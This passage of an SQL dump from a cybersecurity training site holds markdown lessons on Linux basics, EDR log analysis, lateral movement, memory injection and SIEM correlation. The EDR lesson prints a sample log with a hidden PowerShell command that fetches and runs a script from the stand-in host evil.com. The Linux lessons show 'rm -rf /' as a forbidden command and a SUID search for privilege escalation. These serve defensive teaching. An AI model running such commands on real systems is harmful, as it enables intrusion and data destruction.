(11, 'Digital Forensics & Incident Response (DFIR)', 'Master the art of responding to cyber attacks. Learn digital forensics, memory analysis, and the incident response lifecycle.', 'intermediate', 60, NULL, 5, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(12, 'Network Security & Traffic Analysis', 'Master the foundational protocols of the internet and learn how to analyze network traffic to detect and stop cyber attacks.', 'intermediate', 50, NULL, 6, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `lesson_content`
--

--
-- Body text of a lesson, one row per task (the dumped rows below are
-- multi-kilobyte markdown documents).
--
-- No PRIMARY KEY or FOREIGN KEY is declared here. NOTE(review): phpMyAdmin
-- normally emits them in a later section outside this chunk - verify `id` is
-- keyed and `task_id` is unique/indexed, since content is fetched by task.
--
CREATE TABLE `lesson_content` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,  -- the task this lesson belongs to (no FK declared here)
  `content` text NOT NULL,  -- TEXT caps at 64 KiB; consider MEDIUMTEXT if lessons grow, and note that a non-strict sql_mode truncates oversize values silently
  `content_type` enum('markdown','html') DEFAULT 'markdown',  -- SECURITY: 'html' presumably means the body is rendered verbatim. Only trusted authors may write it, and the markdown renderer must also have raw HTML disabled or sanitised, or this column is a stored-XSS sink.
  `reading_time_minutes` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `lesson_content`
--

INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1, 1, '## What is Cybersecurity?\n\n**Cybersecurity** is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.\n\n---\n\n### The Evolution of Hacking\nTo understand where we are, we must look at where we came from.\n\n#### 1. The Era of Phreaking (1970s)\nBefore computers were networked, hackers targeted **phones**. \"Phreakers\" like John Draper (Captain Crunch) used a toy whistle that emitted a 2600Hz tone. This tone tricked the AT&T phone switches into giving free long-distance calls.\n*   **Motivation**: Curiosity.\n\n#### 2. The Morris Worm (1988)\nRobert Morris wrote a script to gauge the size of the internet. A coding error made it propagate uncontrollably. It crashed 10% of the entire internet.\n*   **Impact**: The first conviction under the Computer Fraud and Abuse Act.\n\n#### 3. The Script Kiddie Era (1990s-2000s)\nTools became public. You didn\'t need to know C code; you just needed to download \"Sub7\" or \"Back Orifice\". Defacements of websites were common.\n*   **Motivation**: Fame / Notoriety.\n\n#### 4. The Era of Cybercrime (2010s-Present)\nHacking became a business. Organized crime groups (like Conti, LockBit) run \"Ransomware as a Service\". They have HR departments, helpdesks, and payroll.\n*   **Motivation**: Money. Trillions of dollars lost annually.\n\n#### 5. Cyber Warfare (State Sponsored)\nNations (US, China, Russia, Israel, Iran) use cyber tools for espionage and sabotage.\n*   **Stuxnet (2010)**: A worm that physically destroyed Iranian nuclear centrifuges. The first \"digital weapon\".\n\n---\n\n### Why is Cybersecurity Hard?\n1.  **The Defender\'s Dilemma**: A defender must be right 100% of the time. An attacker only needs to be right ONCE.\n2.  **Complexity**: Modern software has millions of lines of code. Bugs are inevitable.\n3.  
**The Human Factor**: You can have a $1 Million Firewall, but if Dave in Accounting clicks a link that says \"Free iPhone\", you are breached.\n\n### Key Terminology\n*   **Threat**: The potential cause of an unwanted incident (e.g., A hacker, a hurricane).\n*   **Vulnerability**: A weakness in a system (e.g., Weak password, unpatched Windows).\n*   **Risk**: The likelihood of a Threat exploiting a Vulnerability, weighted by the Impact if it does (`Risk = Threat x Vulnerability x Impact`).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
(2, 2, '## Threats, Vulnerabilities, and Exploits\n\nThe \"Holy Trinity\" of InfoSec. You must master these definitions.\n\n### 1. Vulnerability (The Lock is Broken)\nA flaw or weakness in system security procedures, design, implementation, or internal controls.\n*   **Software Vulns**: SQL Injection, Buffer Overflow.\n*   **Hardware Vulns**: Meltdown/Spectre (CPU flaws).\n*   **Human Vulns**: Gullibility (Phishing), Laziness (Weak passwords).\n*   **CVE (Common Vulnerabilities and Exposures)**: The global ID system for vulns. e.g., `CVE-2021-44228` (Log4j).\n\n### 2. Threat (The Thief)\nAny circumstance or event with the potential to adversely impact operations.\n*   **Adversarial Threats**: Hackers, Nation States, Insiders.\n*   **Environmental Threats**: Floods, Earthquakes, Power Failure.\n*   **Accidental Threats**: Users deleting the wrong database.\n\n### 3. Exploit (The Key)\nCode or a technique that takes advantage of a vulnerability.\n*   **Zero-Day Exploit**: An exploit for a vulnerability that the vendor (e.g., Microsoft) does **not** know about yet. There is no patch. These are worth millions on the black market.\n*   **Public Exploit**: Code available on Exploit-DB or GitHub.\n\n---\n\n### The Equation of Risk\n> **Risk = Threat × Vulnerability × Impact**\n\n*   **Scenario A**:\n    *   Threat: High (Nation State).\n    *   Vuln: High (Unpatched Server).\n    *   Impact: High (Database with all customer SSNs).\n    *   **Result**: CRITICAL RISK.\n\n*   **Scenario B**:\n    *   Threat: High.\n    *   Vuln: High.\n    *   Impact: Low (The server hosts the cafeteria menu).\n    *   **Result**: LOW RISK.\n\n**Risk Management** is about lowering one of these variables.\n*   We can\'t lower the **Threat** (Hackers exist).\n*   We can lower the **Vuln** (Patching).\n*   We can lower the **Impact** (Network Segmentation, Backups).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'),
(3, 3, '## Careers in Cybersecurity\n\nThe field is massive. It is not just \"Hacking\".\n\n### 1. The Blue Team (Defenders)\nThey build, monitor, and defend. 80% of jobs are here.\n*   **SOC Analyst (Tier 1/2/3)**: The first line of defense. Monitors logs, triages alerts. \"The Firefighter\".\n*   **Security Engineer**: Builds the tools. Configures Firewalls (Palo Alto), SIEMs (Splunk), and EDRs (CrowdStrike).\n*   **Incident Responder (IR)**: The SWAT team. Called in when a breach is confirmed to kick the attacker out.\n*   **Threat Hunter**: Proactively searches for threats that evaded the SOC.\n\n### 2. The Red Team (Offense)\nAuthorized hackers who test defenses.\n*   **Penetration Tester**: Hired to break into a specific app or network to find bugs.\n*   **Red Teamer**: Simulation of a full adversary (APT). They might phish employees, clone badges, or break windows.\n\n### 3. Engineering & GRC\n*   **DevSecOps**: Writes secure code and builds security into the pipeline.\n*   **GRC (Governance, Risk, Compliance)**: Policy writers. Auditors. They ensure the company follows laws (GDPR, HIPAA) and standards (ISO 27001). \"The Lawyers of Cyber\".\n\n---\n\n### Certificates vs Degrees\nCybersecurity is a meritocracy. Practical skills often outweigh degrees.\n*   **Entry Level**: CompTIA Security+, Network+.\n*   **Technical**: OSCP (PenTesting), BTL1 (Blue Team), CCNA (Networking).\n*   **Management**: CISSP (The \"Gold Standard\" for HR filters, but less technical).\n\n### How to Start?\n1.  **Learn Linux**: It is the OS of the internet.\n2.  **Learn Networking**: You can\'t hack a network if you don\'t know how IP packets work.\n3.  **Build a Lab**: Set up VirtualBox with Kali Linux and a vulnerable target (Metasploitable).', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-29 13:58:57'),
(4, 4, '\n## 🎯 Learning Objective\n\nUnderstand **Quiz: Cybersecurity Basics** and its role in modern cybersecurity operations.\n\n---\n\n## 📖 Core Concept\n\nQuiz: Cybersecurity Basics is a foundational element of security.\n\n### What is it?\nQuiz: Cybersecurity Basics involves:\n- **Identification**: Recognizing patterns\n- **Analysis**: Understanding impact\n- **Mitigation**: Reducing risk\n\n### Why it Matters\nWithout Quiz: Cybersecurity Basics, organizations cannot effectively defend against threats.\n\n---\n\n## ⚡ Quick Facts\n\n- **Criticality**: High\n- **Frequency**: Daily\n- **Impact**: Operational Security\n\n---\n\n## 🛠️ Analyst Workflow\n\n1. **Monitor**: Watch for indicators\n2. **Analyze**: Verify context\n3. **Escalate**: If confirmed threat\n\n---\n\n## 📝 Summary\n\nMastering **Quiz: Cybersecurity Basics** is essential for Level 1 SOC analysts.\n', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-26 14:39:59'),
(5, 5, '## Setting Up Your Lab\n\nYou cannot learn hacking by reading. You must **do**.\nA Home Lab is a safe place to break things.\n\n### The Virtualization Hypervisor\nAllows you to run multiple Operating Systems on one physical computer.\n*   **VirtualBox**: Free, Open Source. (Recommended).\n*   **VMware Workstation Player**: Free for personal use. Fast.\n\n### The Attack Box: Kali Linux\nA Debian-based Linux distribution pre-installed with 600+ hacking tools.\n*   **Nmap**: Scanner.\n*   **Metasploit**: Exploit Framework.\n*   **Wireshark**: Packet Sniffer.\n*   **Burp Suite**: Web Proxy.\n*   *Download*: Get the \"VirtualBox Image\" from kali.org and verify its SHA256 checksum against the one published there before importing. Do not install the ISO unless you are comfortable.\n\n### The Victim Box: Metasploitable 2\nAn intentionally vulnerable Linux machine.\n*   It has open ports, weak passwords, and old web apps.\n*   **WARNING**: Never expose Metasploitable to the internet (Bridged Mode). Always use \"Host-Only\" or \"NAT Network\" mode in VirtualBox. If you expose it, **you will be hacked**.\n\n### Network Modes\n1.  **NAT**: VM creates a private network inside the host. Can reach the internet outbound; inbound connections are blocked unless you add port forwarding. Safe for the attack box, but a vulnerable victim can still call out.\n2.  **Bridged**: VM gets an IP from your home Router. It sits next to your laptop. Risky for vulnerable VMs.\n3.  **Host-Only**: Isolated network. VM can only talk to Host and other VMs. Most secure for the victim box.\n\n### Lab Exercise\n1.  Install VirtualBox.\n2.  Import Kali Linux.\n3.  Import Metasploitable.\n4.  Set both to \"NAT Network\" (or \"Host-Only\" if Kali does not need internet access).\n5.  Ping Metasploitable from Kali.', 'markdown', 3, '2025-12-26 01:52:35', '2025-12-29 13:58:57'),
(6, 6, '## Linux Navigation\n\nLinux powers 90% of the internet\'s servers, 100% of supercomputers, and most hacking tools. If you can\'t use the terminal, you can\'t do cyber.\n\n### The File System Hierarchy\nLinux does not have `C:`. It starts at Root `/`.\n*   `/` **(Root)**: The base.\n*   `/home`: User directories. (e.g., `/home/baris`). Equivalent to `C:Users`.\n*   `/etc`: Configuration files. (e.g., `/etc/passwd`).\n*   `/var`: Variable data (Logs live in `/var/log`).\n*   `/bin`: Binaries (Programs) like `ls`, `cat`.\n*   `/tmp`: Temporary files. Cleared on reboot.\n\n### Basic Commands\n1.  `pwd` (**Print Working Directory**): Where am I?\n    *   Output: `/home/kali`\n2.  `ls` (**List**): Show files.\n    *   `ls -l`: Long listing (Permissions, Size, Owner).\n    *   `ls -a`: All files (Including hidden files starting with `.`).\n    *   `ls -la`: Hidden + Long. (Muscle memory).\n3.  `cd` (**Change Directory**): Move.\n    *   `cd Downloads`: Go to Downloads.\n    *   `cd ..`: Go up one level.\n    *   `cd ~`: Go home.\n    *   `cd /`: Go to root.\n\n### Absolute vs Relative Paths\n*   **Absolute**: Full address. Always works.\n    *   `cd /var/log/apache2`\n*   **Relative**: Relative to where you are.\n    *   If you are in `/var`, you can type `cd log`.\n\n### Exercise\nOpen your terminal.\n1.  Type `pwd`.\n2.  Type `cd /etc`.\n3.  Type `ls`. Look for `passwd`.\n4.  Type `cd ..` to go back to root.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(7, 7, '## Touching Files\n\nCreating, Moving, and Destroying files.\n\n### Creating\n1.  `touch file.txt`: Creates an empty file.\n2.  `mkdir foldername`: Creates a directory (Make Directory).\n3.  `echo \"Hello\" > file.txt`: Creates a file containing \"Hello\".\n\n### Reading\n1.  `cat file.txt`: Dumps the whole file to screen. Good for small files.\n2.  `less file.txt`: Opens a paginated viewer. Scroll with arrows. Quit with `q`. Good for huge logs.\n3.  `head file.txt`: Shows first 10 lines.\n4.  `tail file.txt`: Shows last 10 lines.\n    *   `tail -f /var/log/syslog`: **Follow**. Shows new lines as they are written in real-time. Crucial for debugging.\n\n### Moving & Renaming\nLinux uses `mv` for both.\n*   **Move**: `mv file.txt /tmp/` (Moves file to tmp).\n*   **Rename**: `mv file.txt newname.txt` (Moves file to same place with new name).\n\n### Copying\n*   `cp file.txt file_backup.txt`\n*   `cp -r folder/ folder_backup/` (Recursive copy for directories).\n\n### Deleting (The Dangerous Part)\n*   `rm file.txt`: Remove file. **There is no Recycle Bin**. It is gone.\n*   `rm -r folder/`: Remove directory.\n*   `rm -rf /`: **The Forbidden Command**. Recursively Force remove Root. Deletes the entire OS. Do not run this.\n\n### Hidden Files\nIn Linux, any file starting with `.` is hidden.\n*   `.bashrc`: Your shell configuration.\n*   `.ssh/`: Your keys.\nYou must use `ls -a` to see them.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(8, 8, '## Linux Permissions\n\nLinux is a multi-user OS. Permissions decide who can Read, Write, or Execute.\n\n### The Output of `ls -l`\nExample: `-rwxr-xr-- 1 owner group size date file`\n\nThe first part `rwxr-xr--` tells the story.\nIt is split into 3 groups of 3 characters:\n1.  **User (Owner)**: `rwx` (Read, Write, Execute).\n2.  **Group**: `r-x` (Read, Execute. No Write).\n3.  **Others (World)**: `r--` (Read only).\n\n### The Modes\n*   **r (Read)**:\n    *   File: View contents.\n    *   Dir: List contents (`ls`).\n*   **w (Write)**:\n    *   File: Modify/Delete content.\n    *   Dir: Create/Delete files inside it.\n*   **x (Execute)**:\n    *   File: Run as a program/script.\n    *   Dir: Enter the directory (`cd`).\n\n### Changing Permissions (`chmod`)\nYou can use numbers (Octal) or letters.\n\n**The Numbers**:\n*   Read = 4\n*   Write = 2\n*   Execute = 1\n*   Total = 7\n\n**Common Sets**:\n*   `chmod 777 file`: Everyone can do everything. **Insecure**.\n*   `chmod 700 dir`: Only I (User) can read/write/enter. Use this for private directories such as `~/.ssh/`.\n*   `chmod 600 file`: Only I can read/write, and nobody can execute. Private keys (`~/.ssh/id_*`) need exactly this; `ssh` refuses a key that is readable by group or others.\n*   `chmod 755 file`: I can do all. Everyone else can Read/Run. (Standard for scripts).\n*   `chmod +x file`: Quick way to make a script executable.\n\n### Changing Owner (`chown`)\n*   `chown user:group file`\n*   `chown root:root /etc/shadow`', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(9, 9, '## Finding Files\n\nYou hacked a server. You want to find \"passwords.txt\". How?\n\n### 1. `locate`\nThe fast, indexed search.\n*   `locate password.txt`\n*   **Pros**: Instant.\n*   **Cons**: Relies on a database (`updatedb`). If the file was made 1 minute ago, locate won\'t find it.\n\n### 2. `find`\nThe powerful, real-time crawler.\n*   Syntax: `find [where] [filters] [action]`\n\n**Examples**:\n*   `find / -name \"flag.txt\"`: Search whole drive for flag.txt.\n*   `find /home -name \"*.conf\"`: Search home for configs.\n*   `find / -type f -size +100M`: Find files larger than 100MB.\n*   `find / -type f -perm -4000 2>/dev/null`: Find SUID files (Privilege Escalation gold). Compare the list against a clean install of the same distro; the interesting entries are the ones that should not be there.\n    *   `2>/dev/null` hides \"Permission Denied\" errors so you only see clean results.\n\n### 3. `which`\nFinds executable binaries in your PATH.\n*   `which python`: Shows `/usr/bin/python`.\n*   If `which` returns nothing, the tool is not installed or not in PATH.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'),
(10, 10, '## Grep (Global Regular Expression Print)\n\nGrep is the search tool for **content**. It finds text *inside* files.\n\n### Basic Usage\n*   `grep \"error\" /var/log/syslog`: Show me lines containing \"error\".\n*   `grep -i \"pass\" file.txt`: Case insensitive (finds \"Pass\", \"PASS\").\n*   `grep -r \"apikey\" /var/www/html/`: **Recursive**. Search every file in the website folder for \"apikey\".\n\n### Pipes (`|`)\nThe pipe takes the output of the Left command and feeds it to the Right command. It is the most powerful feature of Linux.\n\n*   `cat huge_log.txt | grep \"IP: 1.2.3.4\"`\n    *   1. Cat dumps the file.\n    *   2. Pipe catches it.\n    *   3. Grep filters it.\n*   `ls -la | grep \"Aug\"`: Show files modified in August.\n*   `history | grep \"ssh\"`: Search my command history for SSH connections.\n\n### Real World Scenario: Log Analysis\nYou are investigating a web server access log.\n1.  `cat access.log | grep \"404\"` (Find failures).\n2.  `cat access.log | grep \"admin.php\"` (Find attempts to access admin).\n3.  `cat access.log | awk \'{print $1}\' | sort | uniq -c | sort -nr`: (Count requests by IP address. The \"freq\" command stack).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(11, 11, '## Process Management\n\nEvery program running is a **Process**. Each has a unique **PID** (Process ID).\n\n### Viewing Processes\n1.  `ps`: List my processes.\n2.  `ps aux`: List **ALL** processes from all users.\n    *   **a**: All users.\n    *   **u**: User/owner column.\n    *   **x**: Processes not attached to a terminal (Daemons).\n3.  `top`: Real-time task manager (CPU/RAM usage).\n    *   Press `q` to quit.\n\n### Killing Processes\nSometimes a program crashes or you need to stop a malicious script.\n*   `kill [PID]`\n    *   Example: `kill 1234` (Polite kill request. SIGTERM).\n*   `kill -9 [PID]`\n    *   **Force Kill**. (SIGKILL). The nuclear option. The kernel rips the process out of memory; the process gets no chance to clean up, so use it only when SIGTERM is ignored.\n\n### Backgrounding\n*   **Foreground**: `ping google.com` -> Takes over your terminal.\n*   **Background**: `ping google.com &` -> Runs in background. Terminal is free.\n*   **Ctrl+Z**: Pauses current process.\n*   `bg`: Resumes paused process in background.\n*   `fg`: Brings background process to foreground.\n\n### Services (`systemctl`)\nDaemons that start at boot (like Apache/Nginx).\n*   `systemctl status apache2`\n*   `systemctl start apache2`\n*   `systemctl stop apache2`\n*   `systemctl enable apache2` (Start on boot).', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(12, 12, '## Package Management\n\nInstalling software in Linux. We don\'t google \"download .exe\". We use Repositories (App Stores).\n\n### APT (Debian/Ubuntu/Kali)\n**Advanced Package Tool**. (Prefix these with `sudo` when you are not root.)\n1.  `apt update`: Refreshes the list of available software. (Does NOT install updates).\n    *   *Analogy*: Checking the catalogue to see what is new.\n2.  `apt upgrade`: Actually installs the newer versions of installed packages.\n3.  `apt install [package]`: Installs a tool.\n    *   `apt install nmap`\n    *   `apt install python3`\n4.  `apt remove [package]`: Uninstalls.\n\n### Repositories\nYour OS looks in `/etc/apt/sources.list`.\nIf you try to install \"tool_xyz\" and it says \"Unable to locate package\", your sources.list might be missing the repository that contains it. Only add repositories you trust: every repo you add can ship any package, signed with its own key, to your machine.\n\n### Other Managers\n*   **YUM / DNF**: Used by Red Hat / CentOS / Fedora.\n    *   `dnf install httpd`\n*   **Pacman**: Used by Arch Linux.\n    *   `pacman -S firefox`\n*   **Snap**: Universal packages.\n    *   `snap install discord`\n\n### Compile from Source (Github)\nSometimes a tool isn\'t in Apt. You must build it.\n1.  `git clone https://github.com/user/tool.git`\n2.  `cd tool`\n3.  Look for `README.md`!\n4.  Usually: `./configure`, `make`, `make install` OR `pip install -r requirements.txt` (Python).\n5.  **Supply-chain warning**: these steps run whatever the repository contains, and `make install` usually runs as root. Check out a tagged release or a specific commit, skim the build scripts and `requirements.txt` first, and use a virtual environment (`python3 -m venv`) instead of installing Python packages system-wide.', 'markdown', 3, '2025-12-26 02:18:44', '2025-12-29 13:58:57'),
(350, 349, '# 🦅 Understanding EDR Telemetry\n\nEndpoint Detection and Response (EDR) tools provide a flight recorder for your endpoints. They capture everything a computer does.\n\n## 📝 The Raw Log\nBelow is a raw JSON log from an EDR agent (e.g., CrowdStrike/SentinelOne style).\n\n```json\n{\n  \"event_type\": \"ProcessRollup2\",\n  \"timestamp\": \"2024-03-15T10:45:22Z\",\n  \"hostname\": \"FINANCE-PC-01\",\n  \"user_name\": \"CORP\\\\asmith\",\n  \"file_name\": \"powershell.exe\",\n  \"file_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n  \"command_line\": \"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload.ps1\')\\\"\",\n  \"parent_process\": \"winword.exe\",\n  \"parent_command_line\": \"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE\\\" C:\\\\Users\\\\asmith\\\\Downloads\\\\Invoice_UPDATED.docx\",\n  \"sha256\": \"9f9d5187af9e...\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze the Hierarchy (Parent-Child)\n* **Parent**: `winword.exe` (Microsoft Word)\n* **Child**: `powershell.exe`\n* **Analysis**: Word documents should **never** spawn PowerShell. This is a classic sign of a **Malicious Macro** (a plain `.docx` cannot carry VBA itself, so also look for a remote template, an embedded object, or a renamed `.docm`).\n\n### Step 2: Decode the Command Line\n* `-nop`: NoProfile (skips the user\'s profile scripts, so any logging or hardening configured there never loads).\n* `-w hidden`: WindowStyle Hidden (User sees nothing).\n* `IEX`: Invoke-Expression (Execute code).\n* `DownloadString`: Fetch code from the internet and hand it straight to `IEX`, so nothing is written to disk.\n\n### Step 3: Check the Context\n* **User**: `asmith` (Finance Dept).\n* **Document**: `Invoice_UPDATED.docx`.\n* **Conclusion**: User opened a phishing email with a weaponized invoice. Record the document hash and the download URL as IOCs and search the rest of the fleet for the same parent-child pair.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(351, 350, '# 🌳 Analyzing Process Trees\n\nVisualizing the chain of execution is critical.\n\n## 📝 The Raw Log\nA series of events joined by process ID (PID).\n\n```text\n[TIME: 14:00:01] PID: 1044 | svchost.exe (System Service)\n    └── [TIME: 14:00:05] PID: 2055 | cmd.exe /c \"whoami\"\n        └── [TIME: 14:00:06] PID: 3100 | conhost.exe\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Identify the Root\n* **Root**: `svchost.exe`. This is a generic Windows service host.\n* **Issue**: `svchost.exe` launching `cmd.exe` is highly suspicious. It usually points to a compromised service (like a vulnerability in SMB or a web server running as system).\n* **Check first**: some legitimate services hosted by `svchost.exe` (the Task Scheduler, for example) do spawn `cmd.exe`. Pull the `svchost.exe -k <group>` command line and the service name for PID 1044 before you call it malicious.\n\n### Step 2: Check the Child Activity\n* **Command**: `whoami`.\n* **Context**: This is a \"Discovery\" command. Attackers run it immediately after getting shell access to see who they are (SYSTEM vs User).\n\n### Step 3: The \"Conhost\"\n* `conhost.exe` is normal when `cmd` runs. It handles the console window.\n\n### 🔴 Assessment\nThis looks like a **Reverse Shell** or **Remote Code Execution (RCE)** exploit.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(352, 351, '# 🦀 Detecting Lateral Movement\n\nAfter compromising one machine, attackers move sideways to find the Crown Jewels (Domain Controller).\n\n## 📝 The Raw Log (PsExec Event)\n\n```xml\n<Event xmlns=\'http://schemas.microsoft.com/win/2004/08/events/event\'>\n  <System>\n    <EventID>7045</EventID>\n    <Computer>HR-LAPTOP-04</Computer>\n  </System>\n  <EventData>\n    <Data Name=\'ServiceName\'>PSEXESVC</Data>\n    <Data Name=\'ImagePath\'>%SystemRoot%\\PSEXESVC.exe</Data>\n    <Data Name=\'ServiceType\'>user mode service</Data>\n    <Data Name=\'StartType\'>demand start</Data>\n    <Data Name=\'AccountName\'>LocalSystem</Data>\n  </EventData>\n</Event>\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Analyze Event 7045\n* **Event 7045**: A new service was installed.\n* **ServiceName**: `PSEXESVC`.\n* **Significance**: This is the default service name for **PsExec**, a tool often used by admins but LOVED by hackers for moving laterally.\n\n### Step 2: Contextualize\n* Did authorized IT staff deploy software at this time?\n* If NO, an attacker effectively \"remote controlled\" this machine from another infected host.\n\n### Step 3: Find the Source\n* Look for successful network logins (Event 4624, Type 3) occurring just before this event to find the **Patient Zero** IP.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(353, 352, '# 💉 Memory Injection Techniques\n\nFileless malware doesn\'t write to disk. It lives in RAM.\n\n## 📝 The Raw Log (Sysmon Event 8)\n\n```json\n{\n  \"event_id\": 8,\n  \"desc\": \"CreateRemoteThread\",\n  \"source_image\": \"C:\\\\Users\\\\Bob\\\\AppData\\\\Local\\\\Temp\\\\malware.exe\",\n  \"target_image\": \"C:\\\\Windows\\\\explorer.exe\",\n  \"target_process_id\": \"4022\",\n  \"start_address\": \"0xDEADBEEF\"\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The \"Injector\"\n* **Source**: `malware.exe` running from `Temp`.\n* **State**: This is the malicious dropper.\n* **Caveat**: Event 8 also fires for some legitimate software (security agents, accessibility and debugging tools), so weigh the source path and signer, not the event alone.\n\n### Step 2: The \"Victim\"\n* **Target**: `explorer.exe`. This is the Windows desktop/file manager. It is *always* running.\n* **Action**: `CreateRemoteThread`. The source is forcing the target to run code.\n\n### Step 3: The Result\n* Once injected, `malware.exe` can delete itself.\n* The malicious code now runs INSIDE `explorer.exe`.\n* **Implication**: You will see `explorer.exe` making network connections to an attacker-controlled address. If you kill `explorer`, you kill the user\'s desktop session, and the dropper on disk may already be gone.\n\n### 🛡️ Response\nDo not just kill the process. Isolate the host and run memory forensics.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(354, 353, '# 🛑 Isolating Infected Hosts\n\nTime is money. The faster you act, the less damage occurs.\n\n## 📝 The Response Log (Audit Trail)\n\n```json\n{\n  \"action\": \"ResponseAction\",\n  \"type\": \"NetworkContainment\",\n  \"status\": \"Success\",\n  \"target_host\": \"FINANCE-PC-01\",\n  \"initiator\": \"Analyst_Baris\",\n  \"timestamp\": \"2024-03-15T10:55:00Z\",\n  \"policy\": {\n    \"allow_dns\": false,\n    \"allow_edr_cloud\": true,\n    \"allow_all_else\": false\n  }\n}\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Verification\n* **Action**: `NetworkContainment`.\n* **Policy**: The log confirms that the host can ONLY talk to the EDR cloud (`allow_edr_cloud: true`). This is vital. You don\'t want to lose your own access!\n\n### Step 2: What happens next?\n* The attacker loses their C2 connection.\n* **Active shells die**.\n* **Data exfiltration stops**.\n* The user sees \"No Internet\".\n\n### Step 3: Remediation\n1. **Live Response**: Connect via EDR shell.\n2. **Collect Artifacts**: Get the `Invoice_UPDATED.docx` file.\n3. **Re-image**: Wipe the machine. Better safe than sorry.\n', 'markdown', NULL, '2025-12-26 17:59:30', '2025-12-26 18:04:20'),
(360, 359, '# 🔎 Writing SPL\n\nSearch Processing Language (SPL) is the standard for querying big data in Splunk.\n\n## 📝 The Scenario\nYour boss says \"Find all failed logins from China in the last 24 hours.\"\n\n## 📝 The Raw Query (SPL)\n\n```splunk\nindex=main sourcetype=wineventlog:security EventCode=4625 earliest=-24h\n| iplocation SourceNetworkAddress\n| search Country=\"China\"\n| stats count by SourceNetworkAddress, User\n| sort - count\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Filter Phase\n* `index=main`: Search only the main storage.\n* `EventCode=4625`: Windows Failed Logon.\n* `earliest=-24h`: The \"last 24 hours\" part of the request; without it the search runs over whatever range the time picker defaults to.\n\n### Step 2: Enrichment\n* `iplocation`: Splunk automatically adds `Country`, `City`, `Lat`, `Lon` based on the IP address.\n* **Caveat**: geolocation tells you where the IP is registered, not who is behind it. Attackers route through VPNs and cloud hosts in any country, so use the country filter to triage, never to attribute.\n\n### Step 3: Aggregation\n* `stats count by...`: Instead of showing 10,000 individual log lines, show me a table.\n* **Row 1**: IP `1.2.3.4`, User `Admin`, Count `500`.\n* **Conclusion**: We are under a brute force attack.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(361, 360, '# 🔗 Correlating Events\n\nA single log is a dot. Correlation connects the dots to make a picture.\n\n## 📝 The Raw Logs (Sequence)\n\n```text\n[09:00:01] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:02] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:03] Failed Login (User: Bob, IP: 10.0.0.50)\n... (50 more times)\n[09:01:00] Successful Login (User: Bob, IP: 10.0.0.50)\n[09:01:05] User Created (User: Admin2, By: Bob)\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Brute Force\n* The first block is a classic brute force attack.\n* Note the source `10.0.0.50` is a private address: the attacker is already inside the network (a compromised host or an insider), so that host needs to be isolated too.\n\n### Step 2: The Breakthrough\n* `[09:01:00]`: The attack succeeded. They guessed the password.\n\n### Step 3: Persistence\n* `[09:01:05]`: The very first thing the attacker did was create a BACKDOOR user (`Admin2`).\n* **Why**: Even if Bob changes his password, the attacker can still login as Admin2.\n\n### Step 4: The Correlation Rule\n* `Trigger Alert IF (Failed_Login > 10 in 5 mins) FOLLOWED BY (Successful_Login)`.\n* Group the rule by the **same user and the same source IP**; without that, unrelated users mistyping passwords across the company will trip it all day.\n* Do not stop at the login: the `User Created` event right after is the real escalation, so a second rule, `Successful_Login FOLLOWED BY User_Created within 5 mins`, catches the persistence step even when a slow brute force never trips the first rule.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
